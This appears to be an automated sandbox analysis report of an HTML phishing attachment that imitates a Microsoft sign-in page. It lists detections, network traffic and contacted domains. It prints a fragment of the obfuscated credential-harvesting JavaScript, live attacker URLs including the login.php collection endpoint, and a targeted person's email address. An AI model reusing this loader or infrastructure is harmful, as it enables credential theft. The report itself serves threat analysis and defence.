Edit tour

Windows Analysis Report
ATT-897850.htm

Overview

General Information

Sample name:	ATT-897850.htm
Analysis ID:	1596716
MD5:	d4911b7850cfbc2463b803717c533ad9
SHA1:	bde220a084cb2b2942e68bdb96f5f9b983482808
SHA256:	95b1f4d7e0b52510be839b0803dc7adb91f4d08d50fcd81117e90a7607899d88
Infos:

Detection

HtmlDropper

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Antivirus detection for URL or domain

Suricata IDS alerts for network traffic

Yara detected Html Dropper

AI detected suspicious Javascript

Detected javascript redirector / loader

HTML Script injector detected

HTML file submission containing password form

Detected TCP or UDP traffic on non-standard ports

HTML body contains low number of good links

HTML body contains password input but no form action

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Invalid 'forgot password' link found

Javascript checks online IP of machine

No HTML title found

None HTTPS page querying sensitive user data (password, username or email)

Classification

Process Tree

System is w10x64

chrome.exe (PID: 7660 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\ATT-897850.htm" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 8080 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2204,i,15932215247810093404,10260536024107486679,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_77	JoeSecurity_HtmlDropper_3	Yara detected Html Dropper	Joe Security
dropped/chromecache_75	JoeSecurity_HtmlDropper_3	Yara detected Html Dropper	Joe Security

HTML

Source	Rule	Description	Author	Strings
1.1..script.csv	JoeSecurity_HtmlDropper_3	Yara detected Html Dropper	Joe Security

Suricata Signatures

ETPRO PHISHING Successful Generic Phish 2021-03-25

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-22T12:02:42.909173+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49770	162.0.209.120	443	TCP
2025-01-22T12:03:06.596430+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49772	162.0.209.120	443	TCP
2025-01-22T12:03:39.234166+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49890	162.0.209.120	443	TCP
2025-01-22T12:04:24.284466+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	50045	162.0.209.120	443	TCP
2025-01-22T12:05:23.073678+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	50047	162.0.209.120	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://sopbtech.store/start/xls/includes/css6.css

Avira URL Cloud: Label: phishing

Phishing

AI detected phishing page

Source: file:///C:/Users/user/Desktop/ATT-897850.htm

Joe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 1.2.pages.csv

AI detected suspicious Javascript

Source: 0.0.id.script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/ATT-897850.htm... This script exhibits high-risk behaviors, including the use of a dynamically loaded script from an untrusted domain ('https://copbtech.store/tsk/xls/t1s2kc2v.js'). The script also appears to be collecting a user's email address ('anna.duerksen@bbraun.com'), which could be used for malicious purposes such as phishing or data exfiltration. Overall, the combination of dynamic code execution and potential data collection makes this script highly suspicious and potentially malicious.

Detected javascript redirector / loader

Source: ATT-897850.htm

HTTP Parser: Low number of body elements: 1

HTML Script injector detected

Source: file:///C:/Users/user/Desktop/ATT-897850.htm	HTTP Parser: New script, src: https://copbtech.store/tsk/xls/t1s2kc2v.js
Source: file:///C:/Users/user/Desktop/ATT-897850.htm	HTTP Parser: New script, src: https://copbtech.store/tsk/xls/t1s2kc2v.js
Source: file:///C:/Users/user/Desktop/ATT-897850.htm	HTTP Parser: New script, src: https://copbtech.store/tsk/xls/t1s2kc2v.js
Source: file:///C:/Users/user/Desktop/ATT-897850.htm	HTTP Parser: New script, src: https://copbtech.store/tsk/xls/t1s2kc2v.js

Source: file:///C:/Users/user/Desktop/ATT-897850.htm

HTTP Parser: Number of links: 0

Source: file:///C:/Users/user/Desktop/ATT-897850.htm

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: file:///C:/Users/user/Desktop/ATT-897850.htm

HTTP Parser: Invalid link: Forgot Password?

Source: https://copbtech.store/tsk/xls/t1s2kc2v.js

HTTP Parser: function _0x422a(_0x1e526e,_0x516891){var _0x49c9fb=_0x114c();return _0x422a=function(_0x296a38,_0x3228ba){_0x296a38=_0x296a38-0x156;var _0x4b2f98=_0x49c9fb[_0x296a38];return _0x4b2f98;},_0x422a(_0x1e526e,_0x516891);}function _0x114c(){var _0x30589e=['forgot\x20password?','status','16px','4mwklau','none','text/css','privacy\x20statement','2faerror','<div\x20class=\x22text-right\x22><button\x20type=\x22button\x22\x20class=\x22btn\x20rounded-0\x20text-white\x20px-4\x22\x20id=\x22submit-btn\x22\x20style=\x22background-color:\x20#0066ba;\x22>sign\x20in</button></div>','load','#f2f2f2','1px\x20solid\x20#ddd','.logoname','#next','cursor','translate(-50%,\x20-50%)','34334tyivjj','approve_signin','#sign-in-another-way','(((.+)+)+)+$','keypress','div7','#back-text','20px\x2020px','<img\x20src=\x22https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico\x22\x20class=\x22img-fluid\x20logoimg\x22\x20width=\x2230px\x22>\x20\x20<span\x20class=\x22align-middle\x20h5\x20logoname\x22\x20id=\x22m...

Source: file:///C:/Users/user/Desktop/ATT-897850.htm	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/ATT-897850.htm	HTTP Parser: HTML title missing

Source: file:///C:/Users/user/Desktop/ATT-897850.htm

HTTP Parser: Has password / email / username input fields

Source: file:///C:/Users/user/Desktop/ATT-897850.htm

HTTP Parser: <input type="password" .../> found

Source: ATT-897850.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/ATT-897850.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/ATT-897850.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/ATT-897850.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/ATT-897850.htm	HTTP Parser: No favicon

Source: file:///C:/Users/user/Desktop/ATT-897850.htm	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/ATT-897850.htm	HTTP Parser: No <meta name="author".. found

Source: file:///C:/Users/user/Desktop/ATT-897850.htm	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/ATT-897850.htm	HTTP Parser: No <meta name="copyright".. found

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49770 -> 162.0.209.120:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49772 -> 162.0.209.120:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49890 -> 162.0.209.120:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:50047 -> 162.0.209.120:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:50045 -> 162.0.209.120:443

Source: global traffic

TCP traffic: 192.168.2.4:49760 -> 185.174.100.20:8052

Source: Joe Sandbox View	IP Address: 185.174.100.20 185.174.100.20
Source: Joe Sandbox View	IP Address: 199.188.200.183 199.188.200.183
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View	IP Address: 151.101.66.137 151.101.66.137
Source: Joe Sandbox View	IP Address: 151.101.66.137 151.101.66.137

Source: Joe Sandbox View

ASN Name: ACPCA ACPCA

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 2.22.50.117
Source: unknown	TCP traffic detected without corresponding DNS query: 2.22.50.117
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /tsk/xls/t1s2kc2v.js HTTP/1.1Host: copbtech.storeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /tsk/xls/t1s2kc2v.js HTTP/1.1Host: copbtech.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /start/xls/includes/css6.css HTTP/1.1Host: sopbtech.storeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, /; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /tsk/xls/login.php HTTP/1.1Host: copbtech.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /tsk/xls/login.php HTTP/1.1Host: copbtech.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=5dk3mc9e2i0elqd2p9l9kj4kvm
Source: global traffic	HTTP traffic detected: GET /tsk/xls/login.php HTTP/1.1Host: copbtech.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=5dk3mc9e2i0elqd2p9l9kj4kvm
Source: global traffic	HTTP traffic detected: GET /tsk/xls/login.php HTTP/1.1Host: copbtech.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=5dk3mc9e2i0elqd2p9l9kj4kvm
Source: global traffic	HTTP traffic detected: GET /tsk/xls/login.php HTTP/1.1Host: copbtech.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=5dk3mc9e2i0elqd2p9l9kj4kvm

Source: global traffic	DNS traffic detected: DNS query: copbtech.store
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: sopbtech.store
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: server.povbtech.store
Source: global traffic	DNS traffic detected: DNS query: _8052._https.server.povbtech.store
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org

Source: unknown

HTTP traffic detected: POST /tsk/xls/login.php HTTP/1.1Host: copbtech.storeConnection: keep-aliveContent-Length: 33sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: chromecache_77.2.dr	String found in binary or memory: https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Source: chromecache_75.2.dr, chromecache_77.2.dr	String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Source: ATT-897850.htm	String found in binary or memory: https://copbtech.store/tsk/xls/t1s2kc2v.js
Source: chromecache_82.2.dr	String found in binary or memory: https://getbootstrap.com)
Source: chromecache_82.2.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: chromecache_75.2.dr, chromecache_77.2.dr	String found in binary or memory: https://sopbtech.store/start/xls/includes/css6.css

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: classification engine

Classification label: mal88.phis.troj.winHTM@24/20@20/12

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\ATT-897850.htm"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2204,i,15932215247810093404,10260536024107486679,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2204,i,15932215247810093404,10260536024107486679,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Data Obfuscation

Yara detected Html Dropper

Source: Yara match	File source: 1.1..script.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_77, type: DROPPED
Source: Yara match	File source: dropped/chromecache_75, type: DROPPED

Stealing of Sensitive Information

HTML file submission containing password form

Source: file:///C:/Users/user/Desktop/ATT-897850.htm

HTTP Parser: file:///C:/Users/user/Desktop/ATT-897850.htm

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Ingress Tool Transfer	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file:///C:/Users/user/Desktop/ATT-897850.htm	0%	Avira URL Cloud	safe
https://copbtech.store/tsk/xls/t1s2kc2v.js	0%	Avira URL Cloud	safe
https://copbtech.store/tsk/xls/login.php	0%	Avira URL Cloud	safe
https://sopbtech.store/start/xls/includes/css6.css	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
copbtech.store	162.0.209.120	true	true	unknown
sopbtech.store	199.188.200.183	true	false	unknown
code.jquery.com	151.101.194.137	true	false	high
server.povbtech.store	185.174.100.20	true	false	unknown
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
www.google.com	142.250.184.228	true	false	high
api.ipify.org	104.26.13.205	true	false	high
s-part-0037.t-0009.t-msedge.net	13.107.246.65	true	false	high
_8052._https.server.povbtech.store	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
file:///C:/Users/user/Desktop/ATT-897850.htm	true	Avira URL Cloud: safe	unknown
https://sopbtech.store/start/xls/includes/css6.css	false	Avira URL Cloud: phishing	unknown
https://copbtech.store/tsk/xls/login.php	true	Avira URL Cloud: safe	unknown
https://copbtech.store/tsk/xls/t1s2kc2v.js	true	Avira URL Cloud: safe	unknown
https://code.jquery.com/jquery-3.1.1.min.js	false		high
https://api.ipify.org/?format=json	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/twbs/bootstrap/blob/master/LICENSE)	chromecache_82.2.dr	false		high
https://getbootstrap.com)	chromecache_82.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.174.100.20	server.povbtech.store	Ukraine	8100	ASN-QUADRANET-GLOBALUS	false
199.188.200.183	sopbtech.store	United States	22612	NAMECHEAP-NETUS	false
162.0.209.120	copbtech.store	Canada	35893	ACPCA	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.185.164	unknown	United States	15169	GOOGLEUS	false
151.101.66.137	unknown	United States	54113	FASTLYUS	false
151.101.194.137	code.jquery.com	United States	54113	FASTLYUS	false
142.250.184.228	www.google.com	United States	15169	GOOGLEUS	false
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
172.67.74.152	unknown	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.8
192.168.2.4

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1596716
Start date and time:	2025-01-22 12:01:14 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ATT-897850.htm
Detection:	MAL
Classification:	mal88.phis.troj.winHTM@24/20@20/12
Cookbook Comments:	Found application associated with file extension: .htm

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
